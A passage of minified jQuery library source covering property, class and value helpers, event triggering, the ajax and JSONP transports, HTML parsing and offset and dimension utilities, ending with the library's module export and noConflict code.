e.getAttribute("class") || "" } function gt(e) { return Array.isArray(e) ? e : "string" == typeof e && e.match(O) || [] } b.fn.extend({ prop: function (e, t) { return B(this, b.prop, e, t, arguments.length > 1) }, removeProp: function (e) { return this.each(function () { delete this[b.propFix[e] || e] }) } }), b.extend({ prop: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) return 1 === o && b.isXMLDoc(e) || (t = b.propFix[t] || t, i = b.propHooks[t]), void 0 !== n ? i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : e[t] = n : i && "get" in i && null !== (r = i.get(e, t)) ? r : e[t] }, propHooks: { tabIndex: { get: function (e) { var t = b.find.attr(e, "tabindex"); return t ? parseInt(t, 10) : ft.test(e.nodeName) || pt.test(e.nodeName) && e.href ? 0 : -1 } } }, propFix: { for: "htmlFor", class: "className" } }), d.optSelected || (b.propHooks.selected = { get: function (e) { var t = e.parentNode; return t && t.parentNode && t.parentNode.selectedIndex, null }, set: function (e) { var t = e.parentNode; t && (t.selectedIndex, t.parentNode && t.parentNode.selectedIndex) } }), b.each(["tabIndex", "readOnly", "maxLength", "cellSpacing", "cellPadding", "rowSpan", "colSpan", "useMap", "frameBorder", "contentEditable"], function () { b.propFix[this.toLowerCase()] = this }), b.fn.extend({ addClass: function (e) { var t, n, r, i, o, a, s, u = 0; if (h(e)) return this.each(function (t) { b(this).addClass(e.call(this, t, ht(this))) }); if ((t = gt(e)).length) for (; n = this[u++];)if (i = ht(n), r = 1 === n.nodeType && " " + dt(i) + " ") { for (a = 0; o = t[a++];)r.indexOf(" " + o + " ") < 0 && (r += o + " "); i !== (s = dt(r)) && n.setAttribute("class", s) } return this }, removeClass: function (e) { var t, n, r, i, o, a, s, u = 0; if (h(e)) return this.each(function (t) { b(this).removeClass(e.call(this, t, ht(this))) }); if (!arguments.length) return this.attr("class", ""); if ((t = gt(e)).length) for (; n = this[u++];)if (i = ht(n), r = 1 === n.nodeType && " " + dt(i) + " ") { for (a = 0; o = t[a++];)for (; r.indexOf(" " + o + " ") > -1;)r = r.replace(" " + o + " ", " "); i !== (s = dt(r)) && n.setAttribute("class", s) } return this }, toggleClass: function (e, t) { var n = typeof e, r = "string" === n || Array.isArray(e); return "boolean" == typeof t && r ? t ? this.addClass(e) : this.removeClass(e) : h(e) ? this.each(function (n) { b(this).toggleClass(e.call(this, n, ht(this), t), t) }) : this.each(function () { var t, i, o, a; if (r) for (i = 0, o = b(this), a = gt(e); t = a[i++];)o.hasClass(t) ? o.removeClass(t) : o.addClass(t); else void 0 !== e && "boolean" !== n || ((t = ht(this)) && Y.set(this, "__className__", t), this.setAttribute && this.setAttribute("class", t || !1 === e ? "" : Y.get(this, "__className__") || "")) }) }, hasClass: function (e) { var t, n, r = 0; for (t = " " + e + " "; n = this[r++];)if (1 === n.nodeType && (" " + dt(ht(n)) + " ").indexOf(t) > -1) return !0; return !1 } }); var vt = /\r/g; b.fn.extend({ val: function (e) { var t, n, r, i = this[0]; return arguments.length ? (r = h(e), this.each(function (n) { var i; 1 === this.nodeType && (null == (i = r ? e.call(this, n, b(this).val()) : e) ? i = "" : "number" == typeof i ? i += "" : Array.isArray(i) && (i = b.map(i, function (e) { return null == e ? "" : e + "" })), (t = b.valHooks[this.type] || b.valHooks[this.nodeName.toLowerCase()]) && "set" in t && void 0 !== t.set(this, i, "value") || (this.value = i)) })) : i ? (t = b.valHooks[i.type] || b.valHooks[i.nodeName.toLowerCase()]) && "get" in t && void 0 !== (n = t.get(i, "value")) ? n : "string" == typeof (n = i.value) ? n.replace(vt, "") : null == n ? "" : n : void 0 } }), b.extend({ valHooks: { option: { get: function (e) { var t = b.find.attr(e, "value"); return null != t ? t : dt(b.text(e)) } }, select: { get: function (e) { var t, n, r, i = e.options, o = e.selectedIndex, a = "select-one" === e.type, s = a ? null : [], u = a ? o + 1 : i.length; for (r = o < 0 ? u : a ? o : 0; r < u; r++)if (((n = i[r]).selected || r === o) && !n.disabled && (!n.parentNode.disabled || !k(n.parentNode, "optgroup"))) { if (t = b(n).val(), a) return t; s.push(t) } return s }, set: function (e, t) { for (var n, r, i = e.options, o = b.makeArray(t), a = i.length; a--;)((r = i[a]).selected = b.inArray(b.valHooks.option.get(r), o) > -1) && (n = !0); return n || (e.selectedIndex = -1), o } } } }), b.each(["radio", "checkbox"], function () { b.valHooks[this] = { set: function (e, t) { if (Array.isArray(t)) return e.checked = b.inArray(b(e).val(), t) > -1 } }, d.checkOn || (b.valHooks[this].get = function (e) { return null === e.getAttribute("value") ? "on" : e.value }) }), d.focusin = "onfocusin" in e; var yt = /^(?:focusinfocus|focusoutblur)$/, mt = function (e) { e.stopPropagation() }; b.extend(b.event, { trigger: function (t, n, r, i) { var o, a, s, u, l, f, p, d, y = [r || v], m = c.call(t, "type") ? t.type : t, x = c.call(t, "namespace") ? t.namespace.split(".") : []; if (a = d = s = r = r || v, 3 !== r.nodeType && 8 !== r.nodeType && !yt.test(m + b.event.triggered) && (m.indexOf(".") > -1 && (x = m.split("."), m = x.shift(), x.sort()), l = m.indexOf(":") < 0 && "on" + m, (t = t[b.expando] ? t : new b.Event(m, "object" == typeof t && t)).isTrigger = i ? 2 : 3, t.namespace = x.join("."), t.rnamespace = t.namespace ? new RegExp("(^|\\.)" + x.join("\\.(?:.*\\.|)") + "(\\.|$)") : null, t.result = void 0, t.target || (t.target = r), n = null == n ? [t] : b.makeArray(n, [t]), p = b.event.special[m] || {}, i || !p.trigger || !1 !== p.trigger.apply(r, n))) { if (!i && !p.noBubble && !g(r)) { for (u = p.delegateType || m, yt.test(u + m) || (a = a.parentNode); a; a = a.parentNode)y.push(a), s = a; s === (r.ownerDocument || v) && y.push(s.defaultView || s.parentWindow || e) } for (o = 0; (a = y[o++]) && !t.isPropagationStopped();)d = a, t.type = o > 1 ? u : p.bindType || m, (f = (Y.get(a, "events") || Object.create(null))[t.type] && Y.get(a, "handle")) && f.apply(a, n), (f = l && a[l]) && f.apply && V(a) && (t.result = f.apply(a, n), !1 === t.result && t.preventDefault()); return t.type = m, i || t.isDefaultPrevented() || p._default && !1 !== p._default.apply(y.pop(), n) || !V(r) || l && h(r[m]) && !g(r) && ((s = r[l]) && (r[l] = null), b.event.triggered = m, t.isPropagationStopped() && d.addEventListener(m, mt), r[m](), t.isPropagationStopped() && d.removeEventListener(m, mt), b.event.triggered = void 0, s && (r[l] = s)), t.result } }, simulate: function (e, t, n) { var r = b.extend(new b.Event, n, { type: e, isSimulated: !0 }); b.event.trigger(r, null, t) } }), b.fn.extend({ trigger: function (e, t) { return this.each(function () { b.event.trigger(e, t, this) }) }, triggerHandler: function (e, t) { var n = this[0]; if (n) return b.event.trigger(e, t, n, !0) } }), d.focusin || b.each({ focus: "focusin", blur: "focusout" }, function (e, t) { var n = function (e) { b.event.simulate(t, e.target, b.event.fix(e)) }; b.event.special[t] = { setup: function () { var r = this.ownerDocument || this.document || this, i = Y.access(r, t); i || r.addEventListener(e, n, !0), Y.access(r, t, (i || 0) + 1) }, teardown: function () { var r = this.ownerDocument || this.document || this, i = Y.access(r, t) - 1; i ? Y.access(r, t, i) : (r.removeEventListener(e, n, !0), Y.remove(r, t)) } } }); var xt = e.location, bt = { guid: Date.now() }, wt = /\?/; b.parseXML = function (t) { var n, r; if (!t || "string" != typeof t) return null; try { n = (new e.DOMParser).parseFromString(t, "text/xml") } catch (e) { } return r = n && n.getElementsByTagName("parsererror")[0], n && !r || b.error("Invalid XML: " + (r ? b.map(r.childNodes, function (e) { return e.textContent }).join("\n") : t)), n }; var Tt = /\[\]$/, Ct = /\r?\n/g, Et = /^(?:submit|button|image|reset|file)$/i, St = /^(?:input|select|textarea|keygen)/i; function kt(e, t, n, r) { var i; if (Array.isArray(t)) b.each(t, function (t, i) { n || Tt.test(e) ? r(e, i) : kt(e + "[" + ("object" == typeof i && null != i ? t : "") + "]", i, n, r) }); else if (n || "object" !== x(t)) r(e, t); else for (i in t) kt(e + "[" + i + "]", t[i], n, r) } b.param = function (e, t) { var n, r = [], i = function (e, t) { var n = h(t) ? t() : t; r[r.length] = encodeURIComponent(e) + "=" + encodeURIComponent(null == n ? "" : n) }; if (null == e) return ""; if (Array.isArray(e) || e.jquery && !b.isPlainObject(e)) b.each(e, function () { i(this.name, this.value) }); else for (n in e) kt(n, e[n], t, i); return r.join("&") }, b.fn.extend({ serialize: function () { return b.param(this.serializeArray()) }, serializeArray: function () { return this.map(function () { var e = b.prop(this, "elements"); return e ? b.makeArray(e) : this }).filter(function () { var e = this.type; return this.name && !b(this).is(":disabled") && St.test(this.nodeName) && !Et.test(e) && (this.checked || !de.test(e)) }).map(function (e, t) { var n = b(this).val(); return null == n ? null : Array.isArray(n) ? b.map(n, function (e) { return { name: t.name, value: e.replace(Ct, "\r\n") } }) : { name: t.name, value: n.replace(Ct, "\r\n") } }).get() } }); var At = /%20/g, Nt = /#.*$/, jt = /([?&])_=[^&]*/, Dt = /^(.*?):[ \t]*([^\r\n]*)$/gm, qt = /^(?:GET|HEAD)$/, Lt = /^\/\//, Ht = {}, Ot = {}, Pt = "*/".concat("*"), Rt = v.createElement("a"); function Mt(e) { return function (t, n) { "string" != typeof t && (n = t, t = "*"); var r, i = 0, o = t.toLowerCase().match(O) || []; if (h(n)) for (; r = o[i++];)"+" === r[0] ? (r = r.slice(1) || "*", (e[r] = e[r] || []).unshift(n)) : (e[r] = e[r] || []).push(n) } } function It(e, t, n, r) { var i = {}, o = e === Ot; function a(s) { var u; return i[s] = !0, b.each(e[s] || [], function (e, s) { var l = s(t, n, r); return "string" != typeof l || o || i[l] ? o ? !(u = l) : void 0 : (t.dataTypes.unshift(l), a(l), !1) }), u } return a(t.dataTypes[0]) || !i["*"] && a("*") } function Wt(e, t) { var n, r, i = b.ajaxSettings.flatOptions || {}; for (n in t) void 0 !== t[n] && ((i[n] ? e : r || (r = {}))[n] = t[n]); return r && b.extend(!0, e, r), e } Rt.href = xt.href, b.extend({ active: 0, lastModified: {}, etag: {}, ajaxSettings: { url: xt.href, type: "GET", isLocal: /^(?:about|app|app-storage|.+-extension|file|res|widget):$/.test(xt.protocol), global: !0, processData: !0, async: !0, contentType: "application/x-www-form-urlencoded; charset=UTF-8", accepts: { "*": Pt, text: "text/plain", html: "text/html", xml: "application/xml, text/xml", json: "application/json, text/javascript" }, contents: { xml: /\bxml\b/, html: /\bhtml/, json: /\bjson\b/ }, responseFields: { xml: "responseXML", text: "responseText", json: "responseJSON" }, converters: { "* text": String, "text html": !0, "text json": JSON.parse, "text xml": b.parseXML }, flatOptions: { url: !0, context: !0 } }, ajaxSetup: function (e, t) { return t ? Wt(Wt(e, b.ajaxSettings), t) : Wt(b.ajaxSettings, e) }, ajaxPrefilter: Mt(Ht), ajaxTransport: Mt(Ot), ajax: function (t, n) { "object" == typeof t && (n = t, t = void 0), n = n || {}; var r, i, o, a, s, u, l, c, f, p, d = b.ajaxSetup({}, n), h = d.context || d, g = d.context && (h.nodeType || h.jquery) ? b(h) : b.event, y = b.Deferred(), m = b.Callbacks("once memory"), x = d.statusCode || {}, w = {}, T = {}, C = "canceled", E = { readyState: 0, getResponseHeader: function (e) { var t; if (l) { if (!a) for (a = {}; t = Dt.exec(o);)a[t[1].toLowerCase() + " "] = (a[t[1].toLowerCase() + " "] || []).concat(t[2]); t = a[e.toLowerCase() + " "] } return null == t ? null : t.join(", ") }, getAllResponseHeaders: function () { return l ? o : null }, setRequestHeader: function (e, t) { return null == l && (e = T[e.toLowerCase()] = T[e.toLowerCase()] || e, w[e] = t), this }, overrideMimeType: function (e) { return null == l && (d.mimeType = e), this }, statusCode: function (e) { var t; if (e) if (l) E.always(e[E.status]); else for (t in e) x[t] = [x[t], e[t]]; return this }, abort: function (e) { var t = e || C; return r && r.abort(t), S(0, t), this } }; if (y.promise(E), d.url = ((t || d.url || xt.href) + "").replace(Lt, xt.protocol + "//"), d.type = n.method || n.type || d.method || d.type, d.dataTypes = (d.dataType || "*").toLowerCase().match(O) || [""], null == d.crossDomain) { u = v.createElement("a"); try { u.href = d.url, u.href = u.href, d.crossDomain = Rt.protocol + "//" + Rt.host != u.protocol + "//" + u.host } catch (e) { d.crossDomain = !0 } } if (d.data && d.processData && "string" != typeof d.data && (d.data = b.param(d.data, d.traditional)), It(Ht, d, n, E), l) return E; for (f in (c = b.event && d.global) && 0 == b.active++ && b.event.trigger("ajaxStart"), d.type = d.type.toUpperCase(), d.hasContent = !qt.test(d.type), i = d.url.replace(Nt, ""), d.hasContent ? d.data && d.processData && 0 === (d.contentType || "").indexOf("application/x-www-form-urlencoded") && (d.data = d.data.replace(At, "+")) : (p = d.url.slice(i.length), d.data && (d.processData || "string" == typeof d.data) && (i += (wt.test(i) ? "&" : "?") + d.data, delete d.data), !1 === d.cache && (i = i.replace(jt, "$1"), p = (wt.test(i) ? "&" : "?") + "_=" + bt.guid++ + p), d.url = i + p), d.ifModified && (b.lastModified[i] && E.setRequestHeader("If-Modified-Since", b.lastModified[i]), b.etag[i] && E.setRequestHeader("If-None-Match", b.etag[i])), (d.data && d.hasContent && !1 !== d.contentType || n.contentType) && E.setRequestHeader("Content-Type", d.contentType), E.setRequestHeader("Accept", d.dataTypes[0] && d.accepts[d.dataTypes[0]] ? d.accepts[d.dataTypes[0]] + ("*" !== d.dataTypes[0] ? ", " + Pt + "; q=0.01" : "") : d.accepts["*"]), d.headers) E.setRequestHeader(f, d.headers[f]); if (d.beforeSend && (!1 === d.beforeSend.call(h, E, d) || l)) return E.abort(); if (C = "abort", m.add(d.complete), E.done(d.success), E.fail(d.error), r = It(Ot, d, n, E)) { if (E.readyState = 1, c && g.trigger("ajaxSend", [E, d]), l) return E; d.async && d.timeout > 0 && (s = e.setTimeout(function () { E.abort("timeout") }, d.timeout)); try { l = !1, r.send(w, S) } catch (e) { if (l) throw e; S(-1, e) } } else S(-1, "No Transport"); function S(t, n, a, u) { var f, p, v, w, T, C = n; l || (l = !0, s && e.clearTimeout(s), r = void 0, o = u || "", E.readyState = t > 0 ? 4 : 0, f = t >= 200 && t < 300 || 304 === t, a && (w = function (e, t, n) { for (var r, i, o, a, s = e.contents, u = e.dataTypes; "*" === u[0];)u.shift(), void 0 === r && (r = e.mimeType || t.getResponseHeader("Content-Type")); if (r) for (i in s) if (s[i] && s[i].test(r)) { u.unshift(i); break } if (u[0] in n) o = u[0]; else { for (i in n) { if (!u[0] || e.converters[i + " " + u[0]]) { o = i; break } a || (a = i) } o = o || a } if (o) return o !== u[0] && u.unshift(o), n[o] }(d, E, a)), !f && b.inArray("script", d.dataTypes) > -1 && b.inArray("json", d.dataTypes) < 0 && (d.converters["text script"] = function () { }), w = function (e, t, n, r) { var i, o, a, s, u, l = {}, c = e.dataTypes.slice(); if (c[1]) for (a in e.converters) l[a.toLowerCase()] = e.converters[a]; for (o = c.shift(); o;)if (e.responseFields[o] && (n[e.responseFields[o]] = t), !u && r && e.dataFilter && (t = e.dataFilter(t, e.dataType)), u = o, o = c.shift()) if ("*" === o) o = u; else if ("*" !== u && u !== o) { if (!(a = l[u + " " + o] || l["* " + o])) for (i in l) if ((s = i.split(" "))[1] === o && (a = l[u + " " + s[0]] || l["* " + s[0]])) { !0 === a ? a = l[i] : !0 !== l[i] && (o = s[0], c.unshift(s[1])); break } if (!0 !== a) if (a && e.throws) t = a(t); else try { t = a(t) } catch (e) { return { state: "parsererror", error: a ? e : "No conversion from " + u + " to " + o } } } return { state: "success", data: t } }(d, w, E, f), f ? (d.ifModified && ((T = E.getResponseHeader("Last-Modified")) && (b.lastModified[i] = T), (T = E.getResponseHeader("etag")) && (b.etag[i] = T)), 204 === t || "HEAD" === d.type ? C = "nocontent" : 304 === t ? C = "notmodified" : (C = w.state, p = w.data, f = !(v = w.error))) : (v = C, !t && C || (C = "error", t < 0 && (t = 0))), E.status = t, E.statusText = (n || C) + "", f ? y.resolveWith(h, [p, C, E]) : y.rejectWith(h, [E, C, v]), E.statusCode(x), x = void 0, c && g.trigger(f ? "ajaxSuccess" : "ajaxError", [E, d, f ? p : v]), m.fireWith(h, [E, C]), c && (g.trigger("ajaxComplete", [E, d]), --b.active || b.event.trigger("ajaxStop"))) } return E }, getJSON: function (e, t, n) { return b.get(e, t, n, "json") }, getScript: function (e, t) { return b.get(e, void 0, t, "script") } }), b.each(["get", "post"], function (e, t) { b[t] = function (e, n, r, i) { return h(n) && (i = i || r, r = n, n = void 0), b.ajax(b.extend({ url: e, type: t, dataType: i, data: n, success: r }, b.isPlainObject(e) && e)) } }), b.ajaxPrefilter(function (e) { var t; for (t in e.headers) "content-type" === t.toLowerCase() && (e.contentType = e.headers[t] || "") }), b._evalUrl = function (e, t, n) { return b.ajax({ url: e, type: "GET", dataType: "script", cache: !0, async: !1, global: !1, converters: { "text script": function () { } }, dataFilter: function (e) { b.globalEval(e, t, n) } }) }, b.fn.extend({ wrapAll: function (e) { var t; return this[0] && (h(e) && (e = e.call(this[0])), t = b(e, this[0].ownerDocument).eq(0).clone(!0), this[0].parentNode && t.insertBefore(this[0]), t.map(function () { for (var e = this; e.firstElementChild;)e = e.firstElementChild; return e }).append(this)), this }, wrapInner: function (e) { return h(e) ? this.each(function (t) { b(this).wrapInner(e.call(this, t)) }) : this.each(function () { var t = b(this), n = t.contents(); n.length ? n.wrapAll(e) : t.append(e) }) }, wrap: function (e) { var t = h(e); return this.each(function (n) { b(this).wrapAll(t ? e.call(this, n) : e) }) }, unwrap: function (e) { return this.parent(e).not("body").each(function () { b(this).replaceWith(this.childNodes) }), this } }), b.expr.pseudos.hidden = function (e) { return !b.expr.pseudos.visible(e) }, b.expr.pseudos.visible = function (e) { return !!(e.offsetWidth || e.offsetHeight || e.getClientRects().length) }, b.ajaxSettings.xhr = function () { try { return new e.XMLHttpRequest } catch (e) { } }; var Ft = { 0: 200, 1223: 204 }, $t = b.ajaxSettings.xhr(); d.cors = !!$t && "withCredentials" in $t, d.ajax = $t = !!$t, b.ajaxTransport(function (t) { var n, r; if (d.cors || $t && !t.crossDomain) return { send: function (i, o) { var a, s = t.xhr(); if (s.open(t.type, t.url, t.async, t.username, t.password), t.xhrFields) for (a in t.xhrFields) s[a] = t.xhrFields[a]; for (a in t.mimeType && s.overrideMimeType && s.overrideMimeType(t.mimeType), t.crossDomain || i["X-Requested-With"] || (i["X-Requested-With"] = "XMLHttpRequest"), i) s.setRequestHeader(a, i[a]); n = function (e) { return function () { n && (n = r = s.onload = s.onerror = s.onabort = s.ontimeout = s.onreadystatechange = null, "abort" === e ? s.abort() : "error" === e ? "number" != typeof s.status ? o(0, "error") : o(s.status, s.statusText) : o(Ft[s.status] || s.status, s.statusText, "text" !== (s.responseType || "text") || "string" != typeof s.responseText ? { binary: s.response } : { text: s.responseText }, s.getAllResponseHeaders())) } }, s.onload = n(), r = s.onerror = s.ontimeout = n("error"), void 0 !== s.onabort ? s.onabort = r : s.onreadystatechange = function () { 4 === s.readyState && e.setTimeout(function () { n && r() }) }, n = n("abort"); try { s.send(t.hasContent && t.data || null) } catch (e) { if (n) throw e } }, abort: function () { n && n() } } }), b.ajaxPrefilter(function (e) { e.crossDomain && (e.contents.script = !1) }), b.ajaxSetup({ accepts: { script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript" }, contents: { script: /\b(?:java|ecma)script\b/ }, converters: { "text script": function (e) { return b.globalEval(e), e } } }), b.ajaxPrefilter("script", function (e) { void 0 === e.cache && (e.cache = !1), e.crossDomain && (e.type = "GET") }), b.ajaxTransport("script", function (e) { var t, n; if (e.crossDomain || e.scriptAttrs) return { send: function (r, i) { t = b("<script>").attr(e.scriptAttrs || {}).prop({ charset: e.scriptCharset, src: e.url }).on("load error", n = function (e) { t.remove(), n = null, e && i("error" === e.type ? 404 : 200, e.type) }), v.head.appendChild(t[0]) }, abort: function () { n && n() } } }); var Bt, _t = [], zt = /(=)\?(?=&|$)|\?\?/; b.ajaxSetup({ jsonp: "callback", jsonpCallback: function () { var e = _t.pop() || b.expando + "_" + bt.guid++; return this[e] = !0, e } }), b.ajaxPrefilter("json jsonp", function (t, n, r) { var i, o, a, s = !1 !== t.jsonp && (zt.test(t.url) ? "url" : "string" == typeof t.data && 0 === (t.contentType || "").indexOf("application/x-www-form-urlencoded") && zt.test(t.data) && "data"); if (s || "jsonp" === t.dataTypes[0]) return i = t.jsonpCallback = h(t.jsonpCallback) ? t.jsonpCallback() : t.jsonpCallback, s ? t[s] = t[s].replace(zt, "$1" + i) : !1 !== t.jsonp && (t.url += (wt.test(t.url) ? "&" : "?") + t.jsonp + "=" + i), t.converters["script json"] = function () { return a || b.error(i + " was not called"), a[0] }, t.dataTypes[0] = "json", o = e[i], e[i] = function () { a = arguments }, r.always(function () { void 0 === o ? b(e).removeProp(i) : e[i] = o, t[i] && (t.jsonpCallback = n.jsonpCallback, _t.push(i)), a && h(o) && o(a[0]), a = o = void 0 }), "script" }), d.createHTMLDocument = ((Bt = v.implementation.createHTMLDocument("").body).innerHTML = "<form></form><form></form>", 2 === Bt.childNodes.length), b.parseHTML = function (e, t, n) { return "string" != typeof e ? [] : ("boolean" == typeof t && (n = t, t = !1), t || (d.createHTMLDocument ? ((r = (t = v.implementation.createHTMLDocument("")).createElement("base")).href = v.location.href, t.head.appendChild(r)) : t = v), o = !n && [], (i = A.exec(e)) ? [t.createElement(i[1])] : (i = be([e], t, o), o && o.length && b(o).remove(), b.merge([], i.childNodes))); var r, i, o }, b.fn.load = function (e, t, n) { var r, i, o, a = this, s = e.indexOf(" "); return s > -1 && (r = dt(e.slice(s)), e = e.slice(0, s)), h(t) ? (n = t, t = void 0) : t && "object" == typeof t && (i = "POST"), a.length > 0 && b.ajax({ url: e, type: i || "GET", dataType: "html", data: t }).done(function (e) { o = arguments, a.html(r ? b("<div>").append(b.parseHTML(e)).find(r) : e) }).always(n && function (e, t) { a.each(function () { n.apply(this, o || [e.responseText, t, e]) }) }), this }, b.expr.pseudos.animated = function (e) { return b.grep(b.timers, function (t) { return e === t.elem }).length }, b.offset = { setOffset: function (e, t, n) { var r, i, o, a, s, u, l = b.css(e, "position"), c = b(e), f = {}; "static" === l && (e.style.position = "relative"), s = c.offset(), o = b.css(e, "top"), u = b.css(e, "left"), ("absolute" === l || "fixed" === l) && (o + u).indexOf("auto") > -1 ? (a = (r = c.position()).top, i = r.left) : (a = parseFloat(o) || 0, i = parseFloat(u) || 0), h(t) && (t = t.call(e, n, b.extend({}, s))), null != t.top && (f.top = t.top - s.top + a), null != t.left && (f.left = t.left - s.left + i), "using" in t ? t.using.call(e, f) : c.css(f) } }, b.fn.extend({ offset: function (e) { if (arguments.length) return void 0 === e ? this : this.each(function (t) { b.offset.setOffset(this, e, t) }); var t, n, r = this[0]; return r ? r.getClientRects().length ? (t = r.getBoundingClientRect(), n = r.ownerDocument.defaultView, { top: t.top + n.pageYOffset, left: t.left + n.pageXOffset }) : { top: 0, left: 0 } : void 0 }, position: function () { if (this[0]) { var e, t, n, r = this[0], i = { top: 0, left: 0 }; if ("fixed" === b.css(r, "position")) t = r.getBoundingClientRect(); else { for (t = this.offset(), n = r.ownerDocument, e = r.offsetParent || n.documentElement; e && (e === n.body || e === n.documentElement) && "static" === b.css(e, "position");)e = e.parentNode; e && e !== r && 1 === e.nodeType && ((i = b(e).offset()).top += b.css(e, "borderTopWidth", !0), i.left += b.css(e, "borderLeftWidth", !0)) } return { top: t.top - i.top - b.css(r, "marginTop", !0), left: t.left - i.left - b.css(r, "marginLeft", !0) } } }, offsetParent: function () { return this.map(function () { for (var e = this.offsetParent; e && "static" === b.css(e, "position");)e = e.offsetParent; return e || re }) } }), b.each({ scrollLeft: "pageXOffset", scrollTop: "pageYOffset" }, function (e, t) { var n = "pageYOffset" === t; b.fn[e] = function (r) { return B(this, function (e, r, i) { var o; if (g(e) ? o = e : 9 === e.nodeType && (o = e.defaultView), void 0 === i) return o ? o[t] : e[r]; o ? o.scrollTo(n ? o.pageXOffset : i, n ? i : o.pageYOffset) : e[r] = i }, e, r, arguments.length) } }), b.each(["top", "left"], function (e, t) { b.cssHooks[t] = $e(d.pixelPosition, function (e, n) { if (n) return n = Fe(e, t), Re.test(n) ? b(e).position()[t] + "px" : n }) }), b.each({ Height: "height", Width: "width" }, function (e, t) { b.each({ padding: "inner" + e, content: t, "": "outer" + e }, function (n, r) { b.fn[r] = function (i, o) { var a = arguments.length && (n || "boolean" != typeof i), s = n || (!0 === i || !0 === o ? "margin" : "border"); return B(this, function (t, n, i) { var o; return g(t) ? 0 === r.indexOf("outer") ? t["inner" + e] : t.document.documentElement["client" + e] : 9 === t.nodeType ? (o = t.documentElement, Math.max(t.body["scroll" + e], o["scroll" + e], t.body["offset" + e], o["offset" + e], o["client" + e])) : void 0 === i ? b.css(t, n, s) : b.style(t, n, i, s) }, t, a ? i : void 0, a) } }) }), b.each(["ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend"], function (e, t) { b.fn[t] = function (e) { return this.on(t, e) } }), b.fn.extend({ bind: function (e, t, n) { return this.on(e, null, t, n) }, unbind: function (e, t) { return this.off(e, null, t) }, delegate: function (e, t, n, r) { return this.on(t, e, n, r) }, undelegate: function (e, t, n) { return 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n) }, hover: function (e, t) { return this.mouseenter(e).mouseleave(t || e) } }), b.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function (e, t) { b.fn[t] = function (e, n) { return arguments.length > 0 ? this.on(t, null, e, n) : this.trigger(t) } }); var Ut = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g; b.proxy = function (e, t) { var n, r, o; if ("string" == typeof t && (n = e[t], t = e, e = n), h(e)) return r = i.call(arguments, 2), (o = function () { return e.apply(t || this, r.concat(i.call(arguments))) }).guid = e.guid = e.guid || b.guid++, o }, b.holdReady = function (e) { e ? b.readyWait++ : b.ready(!0) }, b.isArray = Array.isArray, b.parseJSON = JSON.parse, b.nodeName = k, b.isFunction = h, b.isWindow = g, b.camelCase = X, b.type = x, b.now = Date.now, b.isNumeric = function (e) { var t = b.type(e); return ("number" === t || "string" === t) && !isNaN(e - parseFloat(e)) }, b.trim = function (e) { return null == e ? "" : (e + "").replace(Ut, "") }, "function" == typeof define && define.amd && define("jquery", [], function () { return b }); var Xt = e.jQuery, Vt = e.$; return b.noConflict = function (t) { return e.$ === b && (e.$ = Vt), t && e.jQuery === b && (e.jQuery = Xt), b }, void 0 === t && (e.jQuery = e.$ = b), b });
|